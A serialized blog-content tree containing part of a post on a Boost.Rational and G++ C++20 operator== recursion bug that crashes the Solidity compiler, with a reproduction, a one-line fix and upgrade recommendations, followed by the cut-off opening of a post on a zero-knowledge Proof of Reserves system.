boost::",{"type":27,"tag":207,"props":98704,"children":98705},{"style":8920},[98706],{"type":33,"value":98707},"enable_if_c",{"type":27,"tag":207,"props":98709,"children":98710},{"style":226},[98711],{"type":33,"value":98712}," \u003C\n",{"type":27,"tag":207,"props":98714,"children":98715},{"class":209,"line":5466},[98716,98721,98726,98730,98734,98739,98743,98747],{"type":27,"tag":207,"props":98717,"children":98718},{"style":238},[98719],{"type":33,"value":98720}," rational_detail::is_compatible_integer\u003C",{"type":27,"tag":207,"props":98722,"children":98723},{"style":8920},[98724],{"type":33,"value":98725},"Arg",{"type":27,"tag":207,"props":98727,"children":98728},{"style":238},[98729],{"type":33,"value":1123},{"type":27,"tag":207,"props":98731,"children":98732},{"style":8920},[98733],{"type":33,"value":97895},{"type":27,"tag":207,"props":98735,"children":98736},{"style":238},[98737],{"type":33,"value":98738},">::value, ",{"type":27,"tag":207,"props":98740,"children":98741},{"style":214},[98742],{"type":33,"value":36947},{"type":27,"tag":207,"props":98744,"children":98745},{"style":226},[98746],{"type":33,"value":17739},{"type":27,"tag":207,"props":98748,"children":98749},{"style":238},[98750],{"type":33,"value":98751},"::type\n",{"type":27,"tag":207,"props":98753,"children":98754},{"class":209,"line":5530},[98755,98760,98765,98769,98773,98777,98781,98785,98789,98793,98797,98801,98805,98809,98813],{"type":27,"tag":207,"props":98756,"children":98757},{"style":214},[98758],{"type":33,"value":98759}," operator",{"type":27,"tag":207,"props":98761,"children":98762},{"style":238},[98763],{"type":33,"value":98764}," == (",{"type":27,"tag":207,"props":98766,"children":98767},{"style":214},[98768],{"type":33,"value":16931},{"type":27,"tag":207,"props":98770,"children":98771},{"style":8920},[98772],{"type":33,"value":97847},{"type":27,"tag":207,"props":98774,"children":98775},{"style":214},[98776],{"type":33,"value":10398},{"type":27,"tag":207,"props":98778,"children":98779},{"style":220},[98780],{"type":33,"value":254},{"type":27,"tag":207,"props":98782,"children":98783},{"style":238},[98784],{"type":33,"value":1123},{"type":27,"tag":207,"props":98786,"children":98787},{"style":214},[98788],{"type":33,"value":16931},{"type":27,"tag":207,"props":98790,"children":98791},{"style":8920},[98792],{"type":33,"value":97682},{"type":27,"tag":207,"props":98794,"children":98795},{"style":238},[98796],{"type":33,"value":9257},{"type":27,"tag":207,"props":98798,"children":98799},{"style":8920},[98800],{"type":33,"value":97895},{"type":27,"tag":207,"props":98802,"children":98803},{"style":238},[98804],{"type":33,"value":17739},{"type":27,"tag":207,"props":98806,"children":98807},{"style":214},[98808],{"type":33,"value":10398},{"type":27,"tag":207,"props":98810,"children":98811},{"style":220},[98812],{"type":33,"value":223},{"type":27,"tag":207,"props":98814,"children":98815},{"style":238},[98816],{"type":33,"value":10449},{"type":27,"tag":207,"props":98818,"children":98819},{"class":209,"line":7900},[98820],{"type":27,"tag":207,"props":98821,"children":98822},{"style":238},[98823],{"type":33,"value":18158},{"type":27,"tag":207,"props":98825,"children":98826},{"class":209,"line":7909},[98827,98831,98835,98839],{"type":27,"tag":207,"props":98828,"children":98829},{"style":376},[98830],{"type":33,"value":46602},{"type":27,"tag":207,"props":98832,"children":98833},{"style":238},[98834],{"type":33,"value":24039},{"type":27,"tag":207,"props":98836,"children":98837},{"style":226},[98838],{"type":33,"value":15856},{"type":27,"tag":207,"props":98840,"children":98841},{"style":238},[98842],{"type":33,"value":98843}," b; \n",{"type":27,"tag":207,"props":98845,"children":98846},{"class":209,"line":7917},[98847],{"type":27,"tag":207,"props":98848,"children":98849},{"style":238},[98850],{"type":33,"value":451},{"type":27,"tag":36,"props":98852,"children":98853},{},[98854,98856,98862],{"type":33,"value":98855},"This was designed under C++17 semantics. Back then, ",{"type":27,"tag":84,"props":98857,"children":98859},{"className":98858},[],[98860],{"type":33,"value":98861},"rhs == lhs",{"type":33,"value":98863}," would fall back to member overloads if available. All good.",{"type":27,"tag":36,"props":98865,"children":98866},{},[98867,98869,98874,98875,98881],{"type":33,"value":98868},"But under ",{"type":27,"tag":84,"props":98870,"children":98872},{"className":98871},[],[98873],{"type":33,"value":97419},{"type":33,"value":28776},{"type":27,"tag":84,"props":98876,"children":98878},{"className":98877},[],[98879],{"type":33,"value":98880},"G++ \u003C 14",{"type":33,"value":736},{"type":27,"tag":1228,"props":98883,"children":98884},{},[98885,98890,98895,98900],{"type":27,"tag":1232,"props":98886,"children":98887},{},[98888],{"type":33,"value":98889},"G++ incorrectly chooses this non-member operator first",{"type":27,"tag":1232,"props":98891,"children":98892},{},[98893],{"type":33,"value":98894},"C++20 reverses the comparison",{"type":27,"tag":1232,"props":98896,"children":98897},{},[98898],{"type":33,"value":98899},"Which calls the same function again with arguments flipped",{"type":27,"tag":1232,"props":98901,"children":98902},{},[98903],{"type":33,"value":98904},"And so on...",{"type":27,"tag":36,"props":98906,"children":98907},{},[98908,98910,98915],{"type":33,"value":98909},"This creates ",{"type":27,"tag":12606,"props":98911,"children":98912},{},[98913],{"type":33,"value":98914},"infinite recursion",{"type":33,"value":1041},{"type":27,"tag":36,"props":98917,"children":98918},{},[98919],{"type":33,"value":98920},"A minimal example:",{"type":27,"tag":101,"props":98922,"children":98924},{"code":98923,"language":8876,"meta":7,"className":8877,"style":7},"// g++ -std=c++20 -o crash main.cpp && ./crash\n#include \u003Cboost/rational.hpp>\n\nint main() {\n boost::rational\u003Cint> r;\n return r == 0;\n}\n",[98925],{"type":27,"tag":84,"props":98926,"children":98927},{"__ignoreMap":7},[98928,98936,98948,98955,98970,98994,99017],{"type":27,"tag":207,"props":98929,"children":98930},{"class":209,"line":210},[98931],{"type":27,"tag":207,"props":98932,"children":98933},{"style":4647},[98934],{"type":33,"value":98935},"// g++ -std=c++20 -o crash main.cpp && ./crash\n",{"type":27,"tag":207,"props":98937,"children":98938},{"class":209,"line":244},[98939,98943],{"type":27,"tag":207,"props":98940,"children":98941},{"style":376},[98942],{"type":33,"value":97633},{"type":27,"tag":207,"props":98944,"children":98945},{"style":1325},[98946],{"type":33,"value":98947}," \u003Cboost/rational.hpp>\n",{"type":27,"tag":207,"props":98949,"children":98950},{"class":209,"line":270},[98951],{"type":27,"tag":207,"props":98952,"children":98953},{"emptyLinePlaceholder":19},[98954],{"type":33,"value":2062},{"type":27,"tag":207,"props":98956,"children":98957},{"class":209,"line":296},[98958,98962,98966],{"type":27,"tag":207,"props":98959,"children":98960},{"style":214},[98961],{"type":33,"value":26317},{"type":27,"tag":207,"props":98963,"children":98964},{"style":1335},[98965],{"type":33,"value":97997},{"type":27,"tag":207,"props":98967,"children":98968},{"style":238},[98969],{"type":33,"value":23011},{"type":27,"tag":207,"props":98971,"children":98972},{"class":209,"line":445},[98973,98978,98982,98986,98990],{"type":27,"tag":207,"props":98974,"children":98975},{"style":238},[98976],{"type":33,"value":98977}," boost::rational",{"type":27,"tag":207,"props":98979,"children":98980},{"style":226},[98981],{"type":33,"value":9257},{"type":27,"tag":207,"props":98983,"children":98984},{"style":214},[98985],{"type":33,"value":26317},{"type":27,"tag":207,"props":98987,"children":98988},{"style":226},[98989],{"type":33,"value":17739},{"type":27,"tag":207,"props":98991,"children":98992},{"style":238},[98993],{"type":33,"value":98026},{"type":27,"tag":207,"props":98995,"children":98996},{"class":209,"line":867},[98997,99001,99005,99009,99013],{"type":27,"tag":207,"props":98998,"children":98999},{"style":376},[99000],{"type":33,"value":8986},{"type":27,"tag":207,"props":99002,"children":99003},{"style":238},[99004],{"type":33,"value":98038},{"type":27,"tag":207,"props":99006,"children":99007},{"style":226},[99008],{"type":33,"value":15856},{"type":27,"tag":207,"props":99010,"children":99011},{"style":232},[99012],{"type":33,"value":4680},{"type":27,"tag":207,"props":99014,"children":99015},{"style":238},[99016],{"type":33,"value":241},{"type":27,"tag":207,"props":99018,"children":99019},{"class":209,"line":892},[99020],{"type":27,"tag":207,"props":99021,"children":99022},{"style":238},[99023],{"type":33,"value":451},{"type":27,"tag":36,"props":99025,"children":99026},{},[99027],{"type":33,"value":99028},"Expected output: nothing.",{"type":27,"tag":36,"props":99030,"children":99031},{},[99032],{"type":33,"value":99033},"Actual: segmentation fault (stack overflow).",{"type":27,"tag":36,"props":99035,"children":99036},{},[99037,99039,99046],{"type":33,"value":99038},"This exact pattern was ",{"type":27,"tag":47,"props":99040,"children":99043},{"href":99041,"rel":99042},"https://github.com/boostorg/rational/issues/43",[51],[99044],{"type":33,"value":99045},"reported and fixed in Boost rational",{"type":33,"value":99047},", but only in version 1.75+.",{"type":27,"tag":36,"props":99049,"children":99050},{},[99051],{"type":33,"value":99052},"Here’s the one-line fix:",{"type":27,"tag":101,"props":99054,"children":99056},{"code":99055,"language":47607,"meta":7,"className":47605,"style":7},"template \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n- return a == b;\n+ return a.operator==(b);\n}\n",[99057],{"type":27,"tag":84,"props":99058,"children":99059},{"__ignoreMap":7},[99060,99068,99075,99083,99091,99099,99106,99114,99122],{"type":27,"tag":207,"props":99061,"children":99062},{"class":209,"line":210},[99063],{"type":27,"tag":207,"props":99064,"children":99065},{"style":238},[99066],{"type":33,"value":99067},"template \u003Cclass Arg, class IntType>\n",{"type":27,"tag":207,"props":99069,"children":99070},{"class":209,"line":244},[99071],{"type":27,"tag":207,"props":99072,"children":99073},{"style":238},[99074],{"type":33,"value":98684},{"type":27,"tag":207,"props":99076,"children":99077},{"class":209,"line":270},[99078],{"type":27,"tag":207,"props":99079,"children":99080},{"style":238},[99081],{"type":33,"value":99082},"inline typename boost::enable_if_c \u003C\n",{"type":27,"tag":207,"props":99084,"children":99085},{"class":209,"line":296},[99086],{"type":27,"tag":207,"props":99087,"children":99088},{"style":238},[99089],{"type":33,"value":99090}," rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n",{"type":27,"tag":207,"props":99092,"children":99093},{"class":209,"line":445},[99094],{"type":27,"tag":207,"props":99095,"children":99096},{"style":238},[99097],{"type":33,"value":99098}," operator == (const Arg& b, const rational\u003CIntType>& a)\n",{"type":27,"tag":207,"props":99100,"children":99101},{"class":209,"line":867},[99102],{"type":27,"tag":207,"props":99103,"children":99104},{"style":238},[99105],{"type":33,"value":18158},{"type":27,"tag":207,"props":99107,"children":99108},{"class":209,"line":892},[99109],{"type":27,"tag":207,"props":99110,"children":99111},{"style":1325},[99112],{"type":33,"value":99113},"- return a == b;\n",{"type":27,"tag":207,"props":99115,"children":99116},{"class":209,"line":1475},[99117],{"type":27,"tag":207,"props":99118,"children":99119},{"style":232},[99120],{"type":33,"value":99121},"+ return a.operator==(b);\n",{"type":27,"tag":207,"props":99123,"children":99124},{"class":209,"line":2065},[99125],{"type":27,"tag":207,"props":99126,"children":99127},{"style":238},[99128],{"type":33,"value":451},{"type":27,"tag":36,"props":99130,"children":99131},{},[99132,99134,99139,99141,99146],{"type":33,"value":99133},"Instead of calling ",{"type":27,"tag":84,"props":99135,"children":99137},{"className":99136},[],[99138],{"type":33,"value":97465},{"type":33,"value":99140}," — which triggers overload resolution again — the patched version directly calls the member function ",{"type":27,"tag":84,"props":99142,"children":99144},{"className":99143},[],[99145],{"type":33,"value":97473},{"type":33,"value":1041},{"type":27,"tag":36,"props":99148,"children":99149},{},[99150],{"type":33,"value":99151},"This prevents C++20 from triggering recursive rewrites.",{"type":27,"tag":26063,"props":99153,"children":99154},{},[],{"type":27,"tag":28,"props":99156,"children":99158},{"id":99157},"part-iv-how-this-breaks-solidity",[99159],{"type":33,"value":99160},"Part IV: How This Breaks Solidity",{"type":27,"tag":36,"props":99162,"children":99163},{},[99164,99166,99171],{"type":33,"value":99165},"The Solidity codebase uses ",{"type":27,"tag":84,"props":99167,"children":99169},{"className":99168},[],[99170],{"type":33,"value":97320},{"type":33,"value":99172}," to represent certain compile-time constant expressions.",{"type":27,"tag":36,"props":99174,"children":99175},{},[99176,99178,99184],{"type":33,"value":99177},"One snippet that can trigger this issue appears in ",{"type":27,"tag":84,"props":99179,"children":99181},{"className":99180},[],[99182],{"type":33,"value":99183},"DeclarationTypeChecker::endVisit",{"type":33,"value":736},{"type":27,"tag":101,"props":99186,"children":99188},{"code":99187,"language":8876,"meta":7,"className":8877,"style":7},"if (Expression const* length = _typeName.length()) {\n std::optional\u003Crational> lengthValue;\n\n if (length->annotation().type && length->annotation().type->category() == Type::Category::RationalNumber)\n ...\n else if (std::optional\u003CConstantEvaluator::TypedRational> value = ConstantEvaluator::evaluate(...))\n lengthValue = value->value;\n\n if (!lengthValue)\n ...\n else if (*lengthValue == 0) // \u003C-- Infinite recursion happens here\n ...\n}\n",[99189],{"type":27,"tag":84,"props":99190,"children":99191},{"__ignoreMap":7},[99192,99239,99264,99271,99349,99356,99409,99437,99444,99464,99471,99511,99518],{"type":27,"tag":207,"props":99193,"children":99194},{"class":209,"line":210},[99195,99199,99204,99208,99212,99217,99221,99226,99230,99234],{"type":27,"tag":207,"props":99196,"children":99197},{"style":376},[99198],{"type":33,"value":9023},{"type":27,"tag":207,"props":99200,"children":99201},{"style":238},[99202],{"type":33,"value":99203}," (Expression ",{"type":27,"tag":207,"props":99205,"children":99206},{"style":214},[99207],{"type":33,"value":16931},{"type":27,"tag":207,"props":99209,"children":99210},{"style":226},[99211],{"type":33,"value":9286},{"type":27,"tag":207,"props":99213,"children":99214},{"style":238},[99215],{"type":33,"value":99216}," length ",{"type":27,"tag":207,"props":99218,"children":99219},{"style":226},[99220],{"type":33,"value":10380},{"type":27,"tag":207,"props":99222,"children":99223},{"style":220},[99224],{"type":33,"value":99225}," _typeName",{"type":27,"tag":207,"props":99227,"children":99228},{"style":238},[99229],{"type":33,"value":1041},{"type":27,"tag":207,"props":99231,"children":99232},{"style":1335},[99233],{"type":33,"value":9476},{"type":27,"tag":207,"props":99235,"children":99236},{"style":238},[99237],{"type":33,"value":99238},"()) {\n",{"type":27,"tag":207,"props":99240,"children":99241},{"class":209,"line":244},[99242,99247,99251,99255,99259],{"type":27,"tag":207,"props":99243,"children":99244},{"style":238},[99245],{"type":33,"value":99246}," std::optional",{"type":27,"tag":207,"props":99248,"children":99249},{"style":226},[99250],{"type":33,"value":9257},{"type":27,"tag":207,"props":99252,"children":99253},{"style":238},[99254],{"type":33,"value":98324},{"type":27,"tag":207,"props":99256,"children":99257},{"style":226},[99258],{"type":33,"value":17739},{"type":27,"tag":207,"props":99260,"children":99261},{"style":238},[99262],{"type":33,"value":99263}," lengthValue;\n",{"type":27,"tag":207,"props":99265,"children":99266},{"class":209,"line":270},[99267],{"type":27,"tag":207,"props":99268,"children":99269},{"emptyLinePlaceholder":19},[99270],{"type":33,"value":2062},{"type":27,"tag":207,"props":99272,"children":99273},{"class":209,"line":296},[99274,99278,99282,99286,99290,99294,99298,99302,99306,99311,99315,99319,99323,99327,99331,99336,99340,99344],{"type":27,"tag":207,"props":99275,"children":99276},{"style":376},[99277],{"type":33,"value":19556},{"type":27,"tag":207,"props":99279,"children":99280},{"style":238},[99281],{"type":33,"value":686},{"type":27,"tag":207,"props":99283,"children":99284},{"style":220},[99285],{"type":33,"value":9476},{"type":27,"tag":207,"props":99287,"children":99288},{"style":238},[99289],{"type":33,"value":8968},{"type":27,"tag":207,"props":99291,"children":99292},{"style":1335},[99293],{"type":33,"value":37424},{"type":27,"tag":207,"props":99295,"children":99296},{"style":238},[99297],{"type":33,"value":37429},{"type":27,"tag":207,"props":99299,"children":99300},{"style":220},[99301],{"type":33,"value":40014},{"type":27,"tag":207,"props":99303,"children":99304},{"style":226},[99305],{"type":33,"value":21461},{"type":27,"tag":207,"props":99307,"children":99308},{"style":220},[99309],{"type":33,"value":99310}," length",{"type":27,"tag":207,"props":99312,"children":99313},{"style":238},[99314],{"type":33,"value":8968},{"type":27,"tag":207,"props":99316,"children":99317},{"style":1335},[99318],{"type":33,"value":37424},{"type":27,"tag":207,"props":99320,"children":99321},{"style":238},[99322],{"type":33,"value":37429},{"type":27,"tag":207,"props":99324,"children":99325},{"style":220},[99326],{"type":33,"value":40014},{"type":27,"tag":207,"props":99328,"children":99329},{"style":238},[99330],{"type":33,"value":8968},{"type":27,"tag":207,"props":99332,"children":99333},{"style":1335},[99334],{"type":33,"value":99335},"category",{"type":27,"tag":207,"props":99337,"children":99338},{"style":238},[99339],{"type":33,"value":21319},{"type":27,"tag":207,"props":99341,"children":99342},{"style":226},[99343],{"type":33,"value":15856},{"type":27,"tag":207,"props":99345,"children":99346},{"style":238},[99347],{"type":33,"value":99348}," Type::Category::RationalNumber)\n",{"type":27,"tag":207,"props":99350,"children":99351},{"class":209,"line":445},[99352],{"type":27,"tag":207,"props":99353,"children":99354},{"style":238},[99355],{"type":33,"value":89065},{"type":27,"tag":207,"props":99357,"children":99358},{"class":209,"line":867},[99359,99364,99368,99373,99377,99382,99386,99391,99395,99400,99404],{"type":27,"tag":207,"props":99360,"children":99361},{"style":376},[99362],{"type":33,"value":99363}," else",{"type":27,"tag":207,"props":99365,"children":99366},{"style":376},[99367],{"type":33,"value":23063},{"type":27,"tag":207,"props":99369,"children":99370},{"style":238},[99371],{"type":33,"value":99372}," (std::optional",{"type":27,"tag":207,"props":99374,"children":99375},{"style":226},[99376],{"type":33,"value":9257},{"type":27,"tag":207,"props":99378,"children":99379},{"style":238},[99380],{"type":33,"value":99381},"ConstantEvaluator::TypedRational",{"type":27,"tag":207,"props":99383,"children":99384},{"style":226},[99385],{"type":33,"value":17739},{"type":27,"tag":207,"props":99387,"children":99388},{"style":238},[99389],{"type":33,"value":99390}," value ",{"type":27,"tag":207,"props":99392,"children":99393},{"style":226},[99394],{"type":33,"value":10380},{"type":27,"tag":207,"props":99396,"children":99397},{"style":238},[99398],{"type":33,"value":99399}," ConstantEvaluator::",{"type":27,"tag":207,"props":99401,"children":99402},{"style":1335},[99403],{"type":33,"value":45252},{"type":27,"tag":207,"props":99405,"children":99406},{"style":238},[99407],{"type":33,"value":99408},"(...))\n",{"type":27,"tag":207,"props":99410,"children":99411},{"class":209,"line":892},[99412,99417,99421,99425,99429,99433],{"type":27,"tag":207,"props":99413,"children":99414},{"style":238},[99415],{"type":33,"value":99416}," lengthValue ",{"type":27,"tag":207,"props":99418,"children":99419},{"style":226},[99420],{"type":33,"value":10380},{"type":27,"tag":207,"props":99422,"children":99423},{"style":220},[99424],{"type":33,"value":39768},{"type":27,"tag":207,"props":99426,"children":99427},{"style":238},[99428],{"type":33,"value":8968},{"type":27,"tag":207,"props":99430,"children":99431},{"style":220},[99432],{"type":33,"value":4196},{"type":27,"tag":207,"props":99434,"children":99435},{"style":238},[99436],{"type":33,"value":241},{"type":27,"tag":207,"props":99438,"children":99439},{"class":209,"line":1475},[99440],{"type":27,"tag":207,"props":99441,"children":99442},{"emptyLinePlaceholder":19},[99443],{"type":33,"value":2062},{"type":27,"tag":207,"props":99445,"children":99446},{"class":209,"line":2065},[99447,99451,99455,99459],{"type":27,"tag":207,"props":99448,"children":99449},{"style":376},[99450],{"type":33,"value":19556},{"type":27,"tag":207,"props":99452,"children":99453},{"style":238},[99454],{"type":33,"value":686},{"type":27,"tag":207,"props":99456,"children":99457},{"style":226},[99458],{"type":33,"value":27893},{"type":27,"tag":207,"props":99460,"children":99461},{"style":238},[99462],{"type":33,"value":99463},"lengthValue)\n",{"type":27,"tag":207,"props":99465,"children":99466},{"class":209,"line":2092},[99467],{"type":27,"tag":207,"props":99468,"children":99469},{"style":238},[99470],{"type":33,"value":89065},{"type":27,"tag":207,"props":99472,"children":99473},{"class":209,"line":2130},[99474,99478,99482,99486,99490,99494,99498,99502,99506],{"type":27,"tag":207,"props":99475,"children":99476},{"style":376},[99477],{"type":33,"value":99363},{"type":27,"tag":207,"props":99479,"children":99480},{"style":376},[99481],{"type":33,"value":23063},{"type":27,"tag":207,"props":99483,"children":99484},{"style":238},[99485],{"type":33,"value":686},{"type":27,"tag":207,"props":99487,"children":99488},{"style":226},[99489],{"type":33,"value":9286},{"type":27,"tag":207,"props":99491,"children":99492},{"style":238},[99493],{"type":33,"value":97296},{"type":27,"tag":207,"props":99495,"children":99496},{"style":226},[99497],{"type":33,"value":15856},{"type":27,"tag":207,"props":99499,"children":99500},{"style":232},[99501],{"type":33,"value":4680},{"type":27,"tag":207,"props":99503,"children":99504},{"style":238},[99505],{"type":33,"value":10416},{"type":27,"tag":207,"props":99507,"children":99508},{"style":4647},[99509],{"type":33,"value":99510}," // \u003C-- Infinite recursion happens here\n",{"type":27,"tag":207,"props":99512,"children":99513},{"class":209,"line":2168},[99514],{"type":27,"tag":207,"props":99515,"children":99516},{"style":238},[99517],{"type":33,"value":89065},{"type":27,"tag":207,"props":99519,"children":99520},{"class":209,"line":4095},[99521],{"type":27,"tag":207,"props":99522,"children":99523},{"style":238},[99524],{"type":33,"value":451},{"type":27,"tag":36,"props":99526,"children":99527},{},[99528],{"type":33,"value":99529},"Under normal circumstances, this expression is benign. But:",{"type":27,"tag":1228,"props":99531,"children":99532},{},[99533,99538,99543],{"type":27,"tag":1232,"props":99534,"children":99535},{},[99536],{"type":33,"value":99537},"G++ \u003C 14 wrongly prefers Boost's non-member operator",{"type":27,"tag":1232,"props":99539,"children":99540},{},[99541],{"type":33,"value":99542},"C++20 reverses the arguments",{"type":27,"tag":1232,"props":99544,"children":99545},{},[99546],{"type":33,"value":99547},"The non-member operator recursively calls itself",{"type":27,"tag":36,"props":99549,"children":99550},{},[99551],{"type":33,"value":99552},"💥: segmentation fault.",{"type":27,"tag":26063,"props":99554,"children":99555},{},[],{"type":27,"tag":28,"props":99557,"children":99559},{"id":99558},"part-v-what-environments-are-affected",[99560],{"type":33,"value":99561},"Part V: What Environments are Affected?",{"type":27,"tag":36,"props":99563,"children":99564},{},[99565],{"type":33,"value":99566},"If a system uses any of the following:",{"type":27,"tag":1228,"props":99568,"children":99569},{},[99570,99575,99580],{"type":27,"tag":1232,"props":99571,"children":99572},{},[99573],{"type":33,"value":99574},"G++ \u003C 14 (e.g., Ubuntu 22.04 uses 11.4)",{"type":27,"tag":1232,"props":99576,"children":99577},{},[99578],{"type":33,"value":99579},"Boost \u003C 1.75 (e.g., 1.74 ships with Ubuntu)",{"type":27,"tag":1232,"props":99581,"children":99582},{},[99583],{"type":33,"value":99584},"C++20 enabled (default in recent Solidity builds)",{"type":27,"tag":36,"props":99586,"children":99587},{},[99588,99590,99595,99597,99603],{"type":33,"value":99589},"They will encounter this crash ",{"type":27,"tag":12606,"props":99591,"children":99592},{},[99593],{"type":33,"value":99594},"as soon as",{"type":33,"value":99596}," it processes a Solidity source with a length expression like ",{"type":27,"tag":84,"props":99598,"children":99600},{"className":99599},[],[99601],{"type":33,"value":99602},"T[0]",{"type":33,"value":99604}," or anything involving compile-time rational comparisons.",{"type":27,"tag":26063,"props":99606,"children":99607},{},[],{"type":27,"tag":28,"props":99609,"children":99611},{"id":99610},"recommendations",[99612],{"type":33,"value":99613},"Recommendations",{"type":27,"tag":1228,"props":99615,"children":99616},{},[99617,99625],{"type":27,"tag":1232,"props":99618,"children":99619},{},[99620],{"type":27,"tag":12606,"props":99621,"children":99622},{},[99623],{"type":33,"value":99624},"Update Boost to ≥ 1.75",{"type":27,"tag":1232,"props":99626,"children":99627},{},[99628],{"type":27,"tag":12606,"props":99629,"children":99630},{},[99631],{"type":33,"value":99632},"Pin G++ to v14 or later",{"type":27,"tag":26063,"props":99634,"children":99635},{},[],{"type":27,"tag":28,"props":99637,"children":99638},{"id":10112},[99639],{"type":33,"value":10115},{"type":27,"tag":36,"props":99641,"children":99642},{},[99643],{"type":33,"value":99644},"This isn’t a security vulnerability. It doesn’t corrupt memory or allow code execution.",{"type":27,"tag":36,"props":99646,"children":99647},{},[99648,99650,99654],{"type":33,"value":99649},"But it ",{"type":27,"tag":12606,"props":99651,"children":99652},{},[99653],{"type":33,"value":11257},{"type":33,"value":99655}," a reminder of the fragility of modern build stacks. A bug introduced in 2012, fixed in 2024, quietly broke one of the most used blockchain compiler toolchains — all without any code in the Solidity repo being “wrong.”",{"type":27,"tag":36,"props":99657,"children":99658},{},[99659],{"type":33,"value":99660},"Every layer here — Boost, G++, the C++20 spec, and Solidity — behaved “as documented.” But together, they composed into undefined behavior.",{"type":27,"tag":36,"props":99662,"children":99663},{},[99664],{"type":33,"value":99665},"The lesson? Always test critical software under multiple compilers and library versions — especially when enabling a new language standard.",{"type":27,"tag":10127,"props":99667,"children":99668},{},[99669],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":99671},[99672,99673,99678,99681,99682,99683,99684,99685],{"id":97356,"depth":244,"text":97359},{"id":97445,"depth":244,"text":97448,"children":99674},[99675,99676,99677],{"id":97451,"depth":270,"text":97454},{"id":97519,"depth":270,"text":97522},{"id":97610,"depth":270,"text":97613},{"id":98193,"depth":244,"text":98196,"children":99679},[99680],{"id":98199,"depth":270,"text":98202},{"id":98310,"depth":244,"text":98313},{"id":99157,"depth":244,"text":99160},{"id":99558,"depth":244,"text":99561},{"id":99610,"depth":244,"text":99613},{"id":10112,"depth":244,"text":10115},"content:blog:2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug",{"_path":99690,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":99691,"description":99692,"date":99693,"author":38462,"image":99694,"isFeatured":19,"onBlogPage":19,"tags":99696,"body":99699,"_type":10152,"_id":104474,"_source":10154,"_file":104475,"_stem":104476,"_extension":10157},"/blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds","PoRv2: A Fast, Transparent ZK-Based Proof of Reserves","Here, we explore zk-proofs, Merkle trees, and our new open-source implementation, PoRv2. Our proof-of-reserve enables users to verify exchange liabilities without relying on external auditors, setting a new standard for trust.","2025-08-27",{"src":99695,"width":18,"height":18},"/posts/por/title.png",[99697,99698],"zk","por",{"type":24,"children":99700,"toc":104451},[99701,99707,99719,99731,99736,99768,99782,99788,99800,99805,99810,99847,99852,99858,99863,99870,99875,99901,99906,99912,99932,99946,99954,99959,99964,99972,99985,99991,100073,100079,100084,100097,100102,100109,100133,100141,100146,100152,100157,100605,100618,100624,100629,100637,100655,100663,100676,100684,102345,102350,102357,102363,102368,102375,102391,102398,102406,102413,103923,103928,103935,103941,103946,103973,103978,103997,104003,104011,104029,104078,104086,104105,104127,104133,104146,104151,104158,104163,104226,104231,104238,104258,104264,104269,104275,104280,104324,104329,104337,104343,104348,104390,104395,104403,104408,104416,104420,104425,104438],{"type":27,"tag":28,"props":99702,"children":99704},{"id":99703},"what-is-a-proof-of-reserves",[99705],{"type":33,"value":99706},"What is a Proof of Reserves?",{"type":27,"tag":36,"props":99708,"children":99709},{},[99710,99712,99717],{"type":33,"value":99711},"At its heart, ",{"type":27,"tag":12606,"props":99713,"children":99714},{},[99715],{"type":33,"value":99716},"Proof of Reserves (PoR)",{"type":33,"value":99718}," is a crucial system designed to show that a crypto platform genuinely holds the funds it owes to its users. It's how exchanges and custodians can prove, using strong cryptographic methods, that they have enough assets to cover all customer deposits.",{"type":27,"tag":36,"props":99720,"children":99721},{},[99722,99724,99729],{"type":33,"value":99723},"Think of it this way: ",{"type":27,"tag":12606,"props":99725,"children":99726},{},[99727],{"type":33,"value":99728},"PoR",{"type":33,"value":99730}," is about enabling transparency. It's a way for platforms to provide clear, verifiable evidence of their financial health. For users, it means gaining confidence that their funds are secure on the platforms they use.",{"type":27,"tag":36,"props":99732,"children":99733},{},[99734],{"type":33,"value":99735},"Historically, traditional ways of proving reserves often had drawbacks. They might reveal too much sensitive information about the platform and rely heavily on external auditors without a direct user verification method.",{"type":27,"tag":36,"props":99737,"children":99738},{},[99739,99741,99748,99750,99757,99759,99766],{"type":33,"value":99740},"We from OtterSec, in partnership with ",{"type":27,"tag":47,"props":99742,"children":99745},{"href":99743,"rel":99744},"https://backpack.exchange/",[51],[99746],{"type":33,"value":99747},"Backpack",{"type":33,"value":99749},", just developed a Proof of Reserves system that can be used to prove CEX solvency. Our ",{"type":27,"tag":47,"props":99751,"children":99754},{"href":99752,"rel":99753},"https://github.com/otter-sec/por_v2",[51],[99755],{"type":33,"value":99756},"Zero-Knowledge Proof of Reserves (PoRv2)",{"type":33,"value":99758}," was based on ",{"type":27,"tag":47,"props":99760,"children":99763},{"href":99761,"rel":99762},"https://www.okx.com/en-eu/help/zero-knowledge-proofs-what-are-zk-starks-and-how-do-they-work-v2",[51],[99764],{"type":33,"value":99765},"OKX Proof of Reserves algorithm",{"type":33,"value":99767}," since it was the fastest and most efficient one known so far. We also use recursive plonky2 as the algorithm for zero-knowledge proving, but we made some improvements to the circuits for more transparency and verifiable information on the user side, eliminating the need to trust the audit company.",{"type":27,"tag":36,"props":99769,"children":99770},{},[99771,99773,99780],{"type":33,"value":99772},"In addition, we also created and open-sourced a ",{"type":27,"tag":47,"props":99774,"children":99777},{"href":99775,"rel":99776},"https://github.com/otter-sec/por_verifier_server",[51],[99778],{"type":33,"value":99779},"PoR verifier server",{"type":33,"value":99781}," that receives the proofs and validates them.",{"type":27,"tag":28,"props":99783,"children":99785},{"id":99784},"why-do-we-use-zk-for-por",[99786],{"type":33,"value":99787},"Why do we use ZK for PoR?",{"type":27,"tag":36,"props":99789,"children":99790},{},[99791,99793,99798],{"type":33,"value":99792},"Proving reserves is crucial, but it presents a unique challenge for any platform holding user funds: how do you publicly prove solvency without also exposing sensitive user balance information or revealing proprietary financial details? This is where ",{"type":27,"tag":12606,"props":99794,"children":99795},{},[99796],{"type":33,"value":99797},"Zero-Knowledge Proofs (ZKPs)",{"type":33,"value":99799}," become game-changers.",{"type":27,"tag":36,"props":99801,"children":99802},{},[99803],{"type":33,"value":99804},"Simply put, a 